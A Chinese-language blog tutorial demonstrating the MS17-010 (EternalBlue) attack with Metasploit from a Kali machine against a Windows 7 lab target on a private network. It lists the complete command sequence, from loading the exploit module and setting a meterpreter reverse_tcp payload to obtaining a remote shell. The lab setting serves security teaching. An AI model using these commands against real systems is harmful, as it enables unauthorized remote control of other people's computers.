admin管理员组

文章数量:1122832

一、前言:

此处使用kali 2022.3作为攻击机,Windows7 x64旗舰版作为靶机进行演示

二、演示

1、关闭防火墙

这里没有做绕过,所以首先需要手动关闭win7的防火墙

2、查看ip

通过命令查看攻击机和靶机的ip

win7命令:ipconfig

kali命令:ifconfig

win7:192.168.13.132

kali:192.168.13.129

可以看出攻击机和靶机在同一网段下

3、启动msf

运行命令启动msf

msfconsole

启动后会出现一个图案,如果和这个不一样也是正常的,因为这个图案是随机的

4、扫描漏洞进行攻击

运行命令扫描ms17_010漏洞

search ms17_010

选择扫描模块进行漏洞扫描

use auxiliary/scanner/smb/smb_ms17_010

运行攻击模块

use exploit/windows/smb/ms17_010_eternalblue

设置靶机ip

set RHOSTS 192.168.13.132

设置攻击机ip

set LHOST 192.168.13.129

设置攻击载荷

set payload windows/x64/meterpreter/reverse_tcp

进行攻击

exploit

现在就已经攻击成功了

查看系统信息

sysinfo

进入Windows PowerShell

shell

如图所示,会出现乱码

在shell中运行chcp 65001即可解决乱码问题

chcp 65001

然后你就可以在你的靶机里面操作了

本文标签: 演示详细